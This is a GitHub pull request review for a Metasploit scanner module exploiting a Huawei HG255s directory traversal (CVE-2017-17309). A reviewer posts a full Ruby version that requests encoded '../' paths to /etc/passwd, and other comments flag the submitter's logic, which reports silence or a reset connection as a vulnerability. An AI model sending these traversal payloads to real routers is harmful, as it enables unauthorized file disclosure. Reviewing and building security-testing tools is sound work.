### PR TITLE
add auxiliary module huawei_hg255s_directory_traversal.rb [ CVE-2017-17309  ]

### PR DESCRIPTION
**Pull request by ismailtasdelen**
use auxiliary/scanner/http/huawei_hg255s_directory_traversal
set RHOST XXX.XXX.XXX.XXX
run

### CODE REVIEW

**Comment by h00die** [comment]
please run `tools/dev/msftidy.rb <your_file>` and address the concerns.  Also, if possible, and add [documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation) for this module.:

* [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
* [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)

Once that's done. we'll need some form of confirmation. Please send a pcap of successful exploitation to msfdev[at]metasploit.com.

**Comment by ismailtasdelen** [comment]
Thank you for return. So I'm going to do a PoC study today. I'll pass it on today.

**Comment by jmartin-r7** [comment]
Per @h00die's comment please complete `msftidy` requirements and add a documentation file.

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb - [INFO] No CVE references found. Please check before you land!
modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb - [WARNING] Please use 'MetasploitModule' as the class name (you used Metasploit4)
modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb - [WARNING] Module contains old license comment.
modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb - [ERROR] Missing "Author" info, please add
```

**Comment by ismailtasdelen** [comment]
Amazing :D This is my first module in the first metasploit ¯\_(ツ) #saltbae

**Comment by ismailtasdelen** [comment]
Hi @h00die,

What is the latest status for this module ?

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 1]
```diff
@@ -0,0 +1,59 @@
...
+           [
+              ['CVE', '2017-17309' ],
+              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
+           ]
+       )
+       register_options(
+           [
+               Opt::RPORT(80)
+           ], self.class
+       )
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: This is redundant and can be removed. The default port for HTTP modules is TCP port `80`.

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 2]
```diff
@@ -0,0 +1,59 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#
+##
+
+require ‘msf/core’
+
+class Metasploit4 < Msf::Auxiliary
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]:
```suggestion
class MetasploitModule < Msf::Auxiliary
```

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 3]
```diff
@@ -0,0 +1,59 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#
+##
+
+require ‘msf/core’
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: This isn't required.

```suggestion
```

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 4]
```diff
@@ -0,0 +1,59 @@
...
+                       ‘uri’=> url
+               })
+
+               if res
+                   print_good(“Vulnerable! for #{url}”)
+               else
+                   print_status(“Vulnerable(no response) detected for #{url}”)
+               end
+           rescue Errno::ECONNRESET
+               print_status(“Vulnerable(rst) detected for #{url}”)
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: `Vulnerable(rst)` does not have an obvious meaning to the user. A simple `Connection failed` or `Connection reset` would make more sense.

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 5]
```diff
@@ -0,0 +1,59 @@
...
+               res = send_request_raw(
+               {
+                       ‘method’=> ‘GET’,
+                       ‘uri’=> url
+               })
+
+               if res
+                   print_good(“Vulnerable! for #{url}”)
+               else
+                   print_status(“Vulnerable(no response) detected for #{url}”)
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: In what was is no response an indication that the target is vulnerable?

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 6]
```diff
@@ -0,0 +1,59 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#
+##
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: This banner is incorrect. Use:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
```

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 7]
```diff
@@ -0,0 +1,59 @@
...
+
+require ‘msf/core’
+
+class Metasploit4 < Msf::Auxiliary
+   include Msf::Exploit::Remote::HttpClient
+
+   def initialize
+       super(
+           ‘Name’        => ‘Server Directory Traversal at Huawei HG255s’,
+           ‘Version’     => ‘Huawei HG255s Firmware : V100R001C163B025SP02’,
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: The `Version` key is deprecated.

```suggestion
```

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb [hunk 8]
```diff
@@ -0,0 +1,59 @@
...
+##
+
+require ‘msf/core’
+
+class Metasploit4 < Msf::Auxiliary
+   include Msf::Exploit::Remote::HttpClient
+
+   def initialize
+       super(
+           ‘Name’        => ‘Server Directory Traversal at Huawei HG255s’,
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: This does not fit the naming convention.

```suggestion
           'Name'        => 'Huawei HG255 Directory Traversal',
```

**Comment by bcoles** [comment]
> 
> 
> Hi @h00die,
> 
> What is the latest status for this module ?

There are a lot of issues. Please address the following:

* `msftidy` issues
* Use two spaces for indentation
* Replace inferior `’` quotes with superior `'` quotes

**Comment by ismailtasdelen** [comment]
Hi @bcoles & @h00die & @jmartin-r7 ,

Thank you very much for your help. I'm very grateful.

**Comment by ismailtasdelen** [comment]
@bcoles Now I've approved your changes.

**Comment by bcoles** [comment]
I noticed you've requested a review. Please address the existing items.

**Comment by ismailtasdelen** [comment]
@bcoles I reviewed it.

**Comment by bcoles** [comment]
> 
> 
> @bcoles I reviewed it.

You missed a few:

* https://github.com/rapid7/metasploit-framework/pull/12794#issuecomment-574512383
* https://github.com/rapid7/metasploit-framework/pull/12794/files#r366708814
* https://github.com/rapid7/metasploit-framework/pull/12794/files#r366708532
* https://github.com/rapid7/metasploit-framework/pull/12794/files#r366708727
* https://github.com/rapid7/metasploit-framework/pull/12794/files#r366708637

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb (hunk 4 above)
Comment (ismailtasdelen) [reply modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: In this case, you're right.

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb (hunk 5 above)
Comment (ismailtasdelen) [reply modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: I think I've used the extra if else structure here before. Sorry..

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb (hunk 6 above)
Comment (ismailtasdelen) [reply modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: Yeah, I should always add this.

File: modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb (hunk 1 above)
Comment (ismailtasdelen) [reply modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: The Huawei HG255 modem model usually uses port 80. But I saw that there are modems going through https.

Comment (bcoles) [reply modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: The `RPORT` option is made available automatically importing the `Msf::Exploit::Remote::HttpClient` mixin. It should not need to be explicitly defined.

If you decide to leave it in, the `self.class` can be removed, as it is no longer required.

```ruby
register_options([ Opt::RPORT(80) ])
```

Comment (ismailtasdelen) [reply modules/auxiliary/scanner/http/huawei_hg255s_directory_traversal.rb]: Yeah, now I get it.

**Comment by bcoles** [comment]
> 
> 
> @bcoles Everything must be completed now (:

Marking my comments as resolved does not resolve the issues. Please address my comments.

**Comment by ismailtasdelen** [comment]
@bcoles Tomorrow I'm gonna find and solve this problem. Good works (:

**Comment by bcoles** [comment]
This module has many of the same issues as the other module. Here's a cleaned up version. It requires further work.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => 'Huawei HG255 Directory Traversal',
      'Description' => 'The modules exploits a directory traversal vulnerability in Huawei HG255 devices.',
      'Author'      => 'Ismail Tasdelen',
      'License'     => MSF_LICENSE,
      'References'  =>
      [
        ['CVE', '2017-17309'],
        ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
      ]
    )
    register_options([ Opt::RPORT(80) ])
  end

  def run
    urllist = [
      '/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
      '/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
      '/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
      '/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
    ]

    urllist.each do |url|
      begin
        res = send_request_raw({
          'method'=> 'GET',
          'uri'=> url
        })

        if res
          print_good("Vulnerable: #{url}")
        else
          print_error("No response for #{url}")
        end
      rescue Errno::ECONNRESET
        print_error("Connection to #{rhost} failed")
      end
    end
  end
```

It would be nice if the module allowed users to specify the `FILEPATH` for a file to download, downloaded the file, and stored the loot with `store_loot`.

Here's a bunch of example modules:

```
$ ls modules/auxiliary/scanner/http/ | grep travers
a10networks_ax_directory_traversal.rb
apache_activemq_traversal.rb
barracuda_directory_traversal.rb
bitweaver_overlay_type_traversal.rb
cgit_traversal.rb
cisco_directory_traversal.rb
cisco_nac_manager_traversal.rb
citrix_dir_traversal.rb
clansphere_traversal.rb
coldfusion_locale_traversal.rb
dicoogle_traversal.rb
elasticsearch_traversal.rb
glassfish_traversal.rb
goahead_traversal.rb
groupwise_agents_http_traversal.rb
hp_imc_bims_downloadservlet_traversal.rb
hp_imc_faultdownloadservlet_traversal.rb
hp_imc_ictdownloadservlet_traversal.rb
hp_imc_reportimgservlt_traversal.rb
httpdasm_directory_traversal.rb
http_traversal.rb
huawei_hg255s_directory_traversal.rb
kodi_traversal.rb
linknat_vos_traversal.rb
linksys_e1500_traversal.rb
majordomo2_directory_traversal.rb
manageengine_deviceexpert_traversal.rb
manageengine_securitymanager_traversal.rb
netdecision_traversal.rb
netgear_sph200d_traversal.rb
rips_traversal.rb
s40_traversal.rb
servicedesk_plus_traversal.rb
simple_webserver_traversal.rb
smt_ipmi_url_redirect_traversal.rb
sockso_traversal.rb
springcloud_traversal.rb
support_center_plus_directory_traversal.rb
sybase_easerver_traversal.rb
thinvnc_traversal.rb
totaljs_traversal.rb
tplink_traversal_noauth.rb
wangkongbao_traversal.rb
webpagetest_traversal.rb
wildfly_traversal.rb
yaws_traversal.rb
```

**Comment by ismailtasdelen** [comment]
@bcoles  Thanks response. Tomorrow everything will be ready for the module. This information will be useful for learning. 👍

**Pull request closed without merging**